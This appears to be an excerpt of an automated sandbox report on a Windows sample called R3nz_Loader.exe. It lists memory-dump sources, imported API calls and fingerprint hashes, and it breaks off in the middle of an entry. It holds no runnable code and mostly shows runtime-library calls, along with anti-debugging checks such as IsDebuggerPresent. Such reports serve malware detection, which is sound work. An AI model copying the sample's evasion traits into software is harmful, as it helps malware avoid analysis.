• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: ,d`l
• API String ID: 3906539128-3394741074
• Opcode ID: 7542e420332b2dc04974ac65bb1dcb9c9205de64576623f2f047cb8bdb9b4627
• Instruction ID: 06425822be7ce11e14a0dc29862b5c7ff36d8cd1847181dba4415e3ef6e70c80
• Opcode Fuzzy Hash: 7542e420332b2dc04974ac65bb1dcb9c9205de64576623f2f047cb8bdb9b4627
• Instruction Fuzzy Hash: 5F31C47490121CDBCB21DF68D8887CDBBB8BF48314F6041DAE42CA7650E7709B868F55

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6CEF12E6
• IsDebuggerPresent.KERNEL32 ref: 6CEF13B2
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CEF13D2
• UnhandledExceptionFilter.KERNEL32(?), ref: 6CEF13DC
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 8e63aa78fe22930b7498248576d36d488463e88cf0f15dbadb8f67deebf8ade7
• Instruction ID: 72d0c6120216faaef4afcd4208b2cb8a5e495075215e36c41fc6f642bca0ece6
• Opcode Fuzzy Hash: 8e63aa78fe22930b7498248576d36d488463e88cf0f15dbadb8f67deebf8ade7
• Instruction Fuzzy Hash: 23311AB5D0521CDBDB10DFA4D9897CDBBB8BF08304F10419AE41DAB650EB719A858F44
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: q0($q0($JE*$JE*
• API String ID: 0-2654902979
• Opcode ID: 22cc395a2e1de9fdb8c244f879fffaac492311132ebc7052fe4ca7735816faa8
• Instruction ID: bc140a97eaacccb8318331b3c88f28a56f2ecd67e57eb991fae28a565da78e58
• Opcode Fuzzy Hash: 22cc395a2e1de9fdb8c244f879fffaac492311132ebc7052fe4ca7735816faa8
• Instruction Fuzzy Hash: 7022F536F401058FCB08DEBCD5953DD77F2AB5B3A8F20961AD421EB795C62A890ACB50

Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: D$`
• API String ID: 0-881360112
• Opcode ID: 6a100f4532961838e52cb573d23a4a15cb0276d740c292417c27373ee4ad6a8e
• Instruction ID: dfae75b1bbd59b0e42bb945103db464b4d1e3d4ead4d4a0cf5966a703a39621b
• Opcode Fuzzy Hash: 6a100f4532961838e52cb573d23a4a15cb0276d740c292417c27373ee4ad6a8e
• Instruction Fuzzy Hash: 8F331375D087908FDB10CB38C84579EBFF1AF96320F0982A9E4A99B3D2D7748945CB52

APIs
• GetCurrentProcess.KERNEL32(?,?,6CEF2A64,?,00000001,?,?), ref: 6CEF2A87
• TerminateProcess.KERNEL32(00000000,?,6CEF2A64,?,00000001,?,?), ref: 6CEF2A8E
• ExitProcess.KERNEL32 ref: 6CEF2AA0
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: d7f807176b5eea35a1eee7c6ec2da27fe156baaacc5f252d7e66eb6df51ae29e
• Instruction ID: 2f0f10553579f09004c56c94d0862f92c578a2e7ad45ef7a3b2d83b8912ec787
• Opcode Fuzzy Hash: d7f807176b5eea35a1eee7c6ec2da27fe156baaacc5f252d7e66eb6df51ae29e
• Instruction Fuzzy Hash: EAE08631500688EFCF219F55C81CE893B39FB41249F214418F43886A20DB35D943CB50

Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: T$Y$\
• API String ID: 0-3568914233
• Opcode ID: 289b54b5aa3a9cca3ff882fe9fb226b49bd611fd193f30ec27574eaa8a03aed1
• Instruction ID: 643ae8aad0a6e6a57aa6e0d37e3206ba1af531f7ba0296568270cec588c37d75
• Opcode Fuzzy Hash: 289b54b5aa3a9cca3ff882fe9fb226b49bd611fd193f30ec27574eaa8a03aed1
• Instruction Fuzzy Hash: 9861187690C7908FD7209B39C85179FBBE1ABD5324F298B2DD9E9D33C1D27489019B42

Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: EBC@$~%
• API String ID: 0-3517279034
• Opcode ID: 28bad57e38fdf365937965630dadb4b593b6e019008f50a13e5482edffe0111b
• Instruction ID: 04496c93983efb9adbed115ddb88df9603520b7b57f008849deb7ada06ed2c2c
• Opcode Fuzzy Hash: 28bad57e38fdf365937965630dadb4b593b6e019008f50a13e5482edffe0111b
• Instruction Fuzzy Hash: 51322072A083518FE714CF29C8907ABBBE9EFC5314F188A2DF5959B291D774D805CB82

Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: %D
• API String ID: 0-2104738290
• Opcode ID: 3a1542062994c36b8feb9df6d1f83420939c92f524d7e69ec6cb19f85882ebbb
• Instruction ID: 53c3b13661170c49857d5dda960160ad10a0013ee8cd864e0a0c47474c344f9a
• Opcode Fuzzy Hash: 3a1542062994c36b8feb9df6d1f83420939c92f524d7e69ec6cb19f85882ebbb
• Instruction Fuzzy Hash: FF4203F4515B019FD365CF29D841A97BFEAEB8A310F25881EE0AE87350C7746502CF9A

Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: w
• API String ID: 0-476252946
• Opcode ID: e3c94e219d299af9c5d7ff3e4faa21d14f1c1e7f92ba3f932babe35ae5b8fa4d
• Instruction ID: 3dbf384d4b4159b06d85ebeab3e4f920881adf83f83503ee59a959b23ebdc204
• Opcode Fuzzy Hash: e3c94e219d299af9c5d7ff3e4faa21d14f1c1e7f92ba3f932babe35ae5b8fa4d
• Instruction Fuzzy Hash: 6C02C076B442018FDF08CFBCC4913DD7BF2AB5B398F209215D415E7B96C62AC94A8B54

APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CEFA2EC,?,?,00000008,?,?,6CEF9F84,00000000), ref: 6CEFA51E
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: e0bb01eec0eaadfc4506a97ab79b0ce4ffd3a3fbd87249f0ddeec89f554e5baf
• Instruction ID: 5535b7f6eead25e85151ce554eac706799792040bf5e10ffbfa622afaabef9db
• Opcode Fuzzy Hash: e0bb01eec0eaadfc4506a97ab79b0ce4ffd3a3fbd87249f0ddeec89f554e5baf
• Instruction Fuzzy Hash: A8B115316616088FD715CF28C486B997BB1FF45368F358658E8EACF6A1C335E992CB40

APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CEF14BE
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: 8af1f5fb64a00dc7236eb5107fff487f22de79f6a409e4eeeb720b84f82eb462
• Instruction ID: ad846570d6606582b71a6299ec9c730627856a555a72d25a9982061f46f7933b
• Opcode Fuzzy Hash: 8af1f5fb64a00dc7236eb5107fff487f22de79f6a409e4eeeb720b84f82eb462
• Instruction Fuzzy Hash: 4B5157B2E116198BEB05DF95C8817AEB7F0FB49348F24852AD426EB342D374D901CF90

Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 051615a093e74c408bd960ebca71f0e374c2b084c8907923c584d1ea5a6dc894
• Instruction ID: 5234ad079ebcecb8db2ba65bae682df63c2839ea06b8643e89a7ed43bc2855bc
• Opcode Fuzzy Hash: 051615a093e74c408bd960ebca71f0e374c2b084c8907923c584d1ea5a6dc894
• Instruction Fuzzy Hash: 1541937580521CAFDB10DF69CD88AEAB7B9EF45308F2442DEE46DA3310DA359E858F10

Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: e01dc1cf355131fd5b00d80dda3b58d592975bb568c6896c4e48c7cfebd76166
• Instruction ID: 04277c5eb1100065746dd81768a4fd2a6ecc3991dbc114d2f8b78bf80f5bc8e2
• Opcode Fuzzy Hash: e01dc1cf355131fd5b00d80dda3b58d592975bb568c6896c4e48c7cfebd76166
• Instruction Fuzzy Hash: E0811736A042614FC725CF28889136BBBE1BBC5364F19C67DECA99B382D6348C06D7D1

Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 201e8040b6f915feab34fa91d52f5e721dcb99443d2d59c96e61e0ebdff6775c
• Instruction ID: d744761fe5879a676aa4ffef20d1469ee4b81e0382b03279d721848ffa4d76a9
• Opcode Fuzzy Hash: 201e8040b6f915feab34fa91d52f5e721dcb99443d2d59c96e61e0ebdff6775c
• Instruction Fuzzy Hash: C131FC760083049BC318DF08C895A7BB7F5EB86314F25893DE68987390E775E948CBA6

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0

Control-flow Graph (image; legend: Executed / Not Executed): function a65480-a659a8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
                                                                              • String ID: nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$x~D$~D$~D
• API String ID: 0-3050489951

Control-flow Graph (image; legend: Executed / Not Executed): function a62550-a628ce
Strings
Memory Dump Source
• Source File: 00000000.00000002.2233480373.0000000000A12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.2233446565.0000000000A10000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2233550543.0000000000A9E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
                                                                              • String ID: nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$ nD$$|D$0|D$<|D$@{D$\{D$`|D$h{D$t{D$||D$%D${D${D
• API String ID: 0-2526032011

Control-flow Graph (image; legend: Executed / Not Executed): function 6cef6628-6cef676f, with calls to 6cef3f43, 6cef6799, 6cef8557 and 6cef8655
APIs
• ___free_lconv_mon.LIBCMT ref: 6CEF666C
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8574
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8586
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8598
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85AA
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85BC
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85CE
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85E0
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF85F2
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8604
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8616
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF8628
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF863A
  • Part of subcall function 6CEF8557: _free.LIBCMT ref: 6CEF864C
• _free.LIBCMT ref: 6CEF6661
  • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
  • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
• _free.LIBCMT ref: 6CEF6683
• _free.LIBCMT ref: 6CEF6698
• _free.LIBCMT ref: 6CEF66A3
• _free.LIBCMT ref: 6CEF66C5
• _free.LIBCMT ref: 6CEF66D8
• _free.LIBCMT ref: 6CEF66E6
• _free.LIBCMT ref: 6CEF66F1
• _free.LIBCMT ref: 6CEF6729
• _free.LIBCMT ref: 6CEF6730
• _free.LIBCMT ref: 6CEF674D
• _free.LIBCMT ref: 6CEF6765
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0

Control-flow Graph (image; legend: Executed / Not Executed): function 6cef3803-6cef38cf, with calls to 6cef3f43, 6cef362f and 6cef369a
APIs
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: api-ms-$ext-ms-$|1l
• API String ID: 0-2938335441
APIs
• _ValidateLocalCookies.LIBCMT ref: 6CEF1E17
• ___except_validate_context_record.LIBVCRUNTIME ref: 6CEF1E1F
• _ValidateLocalCookies.LIBCMT ref: 6CEF1EA8
• __IsNonwritableInCurrentImage.LIBCMT ref: 6CEF1ED3
• _ValidateLocalCookies.LIBCMT ref: 6CEF1F28
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
Strings
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID:
• String ID: =Il$C:\Users\user\Desktop\R3nz_Loader.exe
• API String ID: 0-4120228309
APIs
  • Part of subcall function 6CEF86BE: _free.LIBCMT ref: 6CEF86E3
• _free.LIBCMT ref: 6CEF8744
  • Part of subcall function 6CEF3F43: HeapFree.KERNEL32(00000000,00000000,?,6CEF317C), ref: 6CEF3F59
  • Part of subcall function 6CEF3F43: GetLastError.KERNEL32(?,?,6CEF317C), ref: 6CEF3F6B
• _free.LIBCMT ref: 6CEF874F
• _free.LIBCMT ref: 6CEF875A
• _free.LIBCMT ref: 6CEF87AE
• _free.LIBCMT ref: 6CEF87B9
• _free.LIBCMT ref: 6CEF87C4
• _free.LIBCMT ref: 6CEF87CF
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CEF7857
• __fassign.LIBCMT ref: 6CEF7A3C
• __fassign.LIBCMT ref: 6CEF7A59
• WriteFile.KERNEL32(?,6CEF5FF3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEF7AA1
• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CEF7AE1
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEF7B89
Memory Dump Source
• Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
• Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
Yara matches
Similarity
• API ID: FileWrite__fassign$ConsoleErrorLastOutput
• String ID:
• API String ID: 1735259414-0
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000001,?,6CEF1F85,6CEF10B0,6CEF0AC9,?,6CEF0D01,?,00000001,?,?,00000001,?,6CF00120,0000000C,6CEF0DFA), ref: 6CEF22C5
                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CEF22D3
                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CEF22EC
                                                                              • SetLastError.KERNEL32(00000000,6CEF0D01,?,00000001,?,?,00000001,?,6CF00120,0000000C,6CEF0DFA,?,00000001,?), ref: 6CEF233E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                               • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmp
                                                                               • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastValue___vcrt_
                                                                              • String ID:
                                                                              • API String ID: 3852720340-0
                                                                              • Opcode ID: 34fd908fa65b1d9d808ee5770bb471e565ffca86ddbfff78375b9c870a2b59dd
                                                                              • Instruction ID: f505e28c71b37c500e40dbda01fd91750325837cbbb0591a67b69392405ddb82
                                                                              • Opcode Fuzzy Hash: 34fd908fa65b1d9d808ee5770bb471e565ffca86ddbfff78375b9c870a2b59dd
                                                                              • Instruction Fuzzy Hash: A901243270E7565EEB0925B56C8CA9E36B8DB2B77C330032DF13081EE2EF9289075195
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CEF24F4,00000000,?,00000001,00000000,?,6CEF256B,00000001,FlsFree,6CEFBD3C,FlsFree,00000000), ref: 6CEF24C3
                                                                              Strings
                                                                              Memory Dump Source
